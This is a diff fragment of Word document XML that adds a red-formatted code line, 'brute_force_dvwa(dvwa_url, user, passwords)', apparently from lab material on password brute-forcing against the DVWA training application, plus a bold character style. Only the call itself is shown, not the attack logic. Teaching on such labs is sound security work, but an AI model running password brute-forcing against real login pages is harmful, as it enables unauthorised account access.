+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>brute_force_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dvwa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dvwa_url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>, user, passwords)</w:t>
+      </w:r>
+    </w:p>
     <w:sectPr>
       <w:headerReference w:type="default" r:id="rId8"/>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -4080,6 +4345,17 @@
       <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="character" w:styleId="Fett">
+    <w:name w:val="Strong"/>
+    <w:basedOn w:val="Absatz-Standardschriftart"/>
+    <w:uiPriority w:val="22"/>
+    <w:qFormat/>
+    <w:rsid w:val="0061659E"/>
+    <w:rPr>
+      <w:b/>
+      <w:bCs/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 
